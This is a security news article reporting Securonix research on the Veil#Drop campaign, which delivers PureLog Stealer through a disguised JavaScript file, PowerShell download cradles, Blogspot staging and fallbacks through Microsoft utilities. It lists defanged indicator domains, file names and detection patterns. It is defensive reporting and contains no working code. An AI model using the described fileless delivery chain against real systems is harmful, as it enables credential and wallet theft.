Hackers Abuse Blogspot and PowerShell Download Cradles to Deploy PureLog Stealer
Security researchers have uncovered a malware delivery campaign called Veil#Drop that abuses Blogspot pages, PowerShell download cradles, and fileless .NET execution to deploy PureLog Stealer on Windows systems.
The campaign starts with a deceptive JavaScript file named transcript.pdf.js. Because Windows often hides known file extensions, the file may appear to victims as a normal PDF document.
Access content across the globe at the highest speed rate.
70% of our readers choose Private Internet Access
70% of our readers choose ExpressVPN
Browse the web from multiple devices with industry-standard security protocols.
Faster dedicated servers for specific actions (currently at summer discounts)
Securonix Threat Research said the infection chain uses compromised websites, malicious JavaScript launchers, Blogspot-hosted payloads, XOR obfuscation, reflective .NET loading, and trusted Microsoft utilities to reduce detection.
How the Veil#Drop Attack Starts
The first stage relies on social engineering. A victim downloads and opens transcript.pdf.js, believing it to be a document rather than a script.
Once executed, the file runs through Windows Script Host and launches PowerShell with execution policy bypasses enabled. PowerShell then fetches the next stage from attacker-controlled Blogspot pages.
The Hacker News reported that Securonix researchers Akshay Gaikwad, Shikha Sangwan, and Aaron Beardslee traced the chain from the disguised JavaScript file to in-memory PureLog Stealer execution.
| Stage | Component | Purpose |
|---|---|---|
| Initial file | transcript.pdf.js | Disguises a JavaScript launcher as a document. |
| Execution | Windows Script Host and PowerShell | Runs commands and retrieves the next payload. |
| Staging | Blogspot-hosted files | Uses trusted web infrastructure to deliver malware stages. |
| Loading | XOR decoding and .NET reflection | Executes payloads in memory without writing a normal executable. |
| Final malware | PureLog Stealer | Steals browser data, credentials, cookies, and cryptocurrency wallet data. |
Why Blogspot Helps the Attack Blend In
Blogspot is a Google-owned blogging platform, so traffic to Blogspot domains may look less suspicious than traffic to newly registered malware domains.

Attackers used Blogspot pages to stage files such as phud.dudus.docx.pdf.olp.sys and niple.docx.odp.pdf.sys. These names also use multiple extensions to make analysis harder at a glance.
HivePro described Veil#Drop as a multi-stage, largely fileless delivery framework that uses Blogspot pages to stage XOR-obfuscated PowerShell loaders before deploying PureLog Stealer.
PowerShell Download Cradles Keep the Chain Fileless
PowerShell download cradles let attackers retrieve and execute code from the web without saving a standard executable to disk. That can reduce the number of files available for antivirus scanning.
In this campaign, PowerShell pulls code from Blogspot and runs it in memory. Later stages decode payloads only at runtime, which creates fewer traditional forensic artifacts.
Microsoft says PowerShell execution policies are a safety feature that help prevent accidental script execution, but they are not a security boundary.
How the Payload Is Hidden
The second-stage loader deletes the original JavaScript launcher and performs additional actions to prepare the system for later execution.
Securonix found that the malware decrypts hidden payload data using a repeating XOR routine. It then builds a new Blogspot URL dynamically, with random characters added so each infection can look slightly different.
Cyber Security News reported that the third-stage file contains two large blocks of encoded numeric data that decode into .NET programs loaded directly into memory.
Trusted Microsoft Tools Serve as Fallbacks
Veil#Drop also abuses legitimate Microsoft-signed utilities, often called LOLBINs, as fallback execution paths. These tools exist on many Windows systems and can appear normal in enterprise environments.
Securonix listed RegSvcs, InstallUtil, MSBuild, CSC, VBC, ILASM, and AspNet_Compiler among the tools observed in the chain.

The Securonix analysis said this fallback architecture helps the malware continue execution when the primary in-memory loading method fails.
What PureLog Stealer Tries to Collect
PureLog Stealer is an information-stealing malware family. Once active, it searches for valuable user and system data that attackers can sell, reuse, or exploit for account takeover.
The final payload can collect browser credentials, cookies, session data, autofill information, browsing history, cryptocurrency wallet data, and host details from infected Windows systems.
HiveProโs advisory says the malware targets browsers including Chrome, Edge, Firefox, Brave, and Opera, as well as wallets such as MetaMask, Exodus, Atomic Wallet, Electrum, Trust Wallet, Coinbase Wallet, and Binance Wallet.
Why Traditional Antivirus May Miss This Campaign
The campaignโs strength comes from combining ordinary-looking parts. JavaScript, PowerShell, Blogspot traffic, and Microsoft utilities are not automatically malicious on their own.
The suspicious behavior becomes clearer when defenders connect the full chain: a document-themed JavaScript file launches PowerShell, PowerShell contacts Blogspot, the loader decodes .NET payloads, and trusted utilities appear as fallback execution paths.

The Hacker News noted that the framework was built to reduce forensic artifacts and maintain stealth throughout the infection lifecycle.
Indicators Mentioned in the Campaign
Organizations should use indicators of compromise as starting points, not as the only detection method. The campaign also changes URLs dynamically, which makes behavior-based hunting important.
| Type | Indicator | Description |
|---|---|---|
| Filename | transcript.pdf.js | Initial JavaScript launcher disguised as a PDF document. |
| Filename | phud.dudus.docx.pdf.olp.sys | Second-stage PowerShell loader retrieved from Blogspot. |
| Filename | niple.docx.odp.pdf.sys | Third-stage loader containing encoded PureLog Stealer assemblies. |
| Domain | htlwub00klocate[.]blogspot[.]com | Blogspot domain used to stage the second-stage payload. |
| Domain | cpyzaramay26[.]blogspot[.]com | Blogspot domain used to stage the third-stage payload. |
What Defenders Should Monitor
Security teams should focus on process chains and script behavior rather than only checking file hashes. A single event may look harmless, but the full sequence can reveal the attack.
- JavaScript files launching wscript.exe or cscript.exe.
- Windows Script Host spawning PowerShell.
- PowerShell running with execution policy bypass flags.
- PowerShell making outbound connections to Blogspot.
- Use of Reflection.Assembly::Load or similar .NET in-memory loading patterns.
- PowerShell spawning InstallUtil, MSBuild, RegSvcs, CSC, VBC, ILASM, or AspNet_Compiler.
- Downloads with multiple misleading extensions such as .pdf.js or .docx.pdf.sys.
Recommended Mitigations
Organizations should limit script execution where it is not needed and collect richer PowerShell telemetry across endpoints.
Microsoftโs execution policy documentation also makes clear that execution policy settings should not replace proper application control, endpoint detection, logging, and least-privilege controls.
Cyber Security News highlighted defenses such as restricting Windows Script Host use, monitoring PowerShell bypass attempts, and watching trusted cloud platforms for unusual traffic patterns.
Practical Steps for Security Teams
Security teams should combine endpoint monitoring, network inspection, and user training. The initial file name is simple, but the chain becomes harder to detect after PowerShell takes over.
- Show file extensions by default on managed Windows systems.
- Block or restrict Windows Script Host where business use is limited.
- Enable PowerShell Script Block Logging and Module Logging.
- Alert on PowerShell download cradle behavior and encoded commands.
- Use application control to restrict risky LOLBIN execution paths.
- Inspect unusual Blogspot traffic from endpoints and servers.
- Train users to avoid unexpected files with double or misleading extensions.
The Bigger Lesson From Veil#Drop
Veil#Drop shows how attackers combine trusted platforms, native Windows utilities, and fileless execution to make malware delivery look ordinary.
For defenders, the answer is not only blocking one domain or one filename. Teams need visibility into process relationships, PowerShell behavior, memory loading, and unusual traffic to trusted platforms.
As attackers continue to abuse legitimate infrastructure, organizations must treat trusted domains and signed utilities as possible parts of an attack chain when their behavior does not match normal business activity.
FAQ
Veil#Drop is a multi-stage malware delivery framework analyzed by Securonix. It uses compromised websites, disguised JavaScript files, PowerShell download cradles, Blogspot-hosted payloads, XOR obfuscation, and in-memory .NET execution to deploy PureLog Stealer.
PureLog Stealer is an information-stealing malware family that can harvest browser passwords, cookies, session data, autofill details, browsing history, cryptocurrency wallet data, and system information from infected Windows hosts.
The campaign starts when a victim opens a deceptive JavaScript file such as transcript.pdf.js. The file can appear like a PDF when Windows hides extensions, but it runs through Windows Script Host and launches PowerShell.
PowerShell download cradles let attackers fetch and run code from the web without dropping a normal executable to disk. This helps the malware reduce forensic artifacts and evade file-based security tools.
Organizations should monitor JavaScript launching PowerShell, PowerShell execution policy bypasses, outbound Blogspot traffic, reflective .NET loading, and PowerShell spawning Microsoft utilities such as InstallUtil, MSBuild, RegSvcs, CSC, VBC, ILASM, or AspNet_Compiler.
Read our disclosure page to find out how can you help VPNCentral sustain the editorial team Read more
User forum
0 messages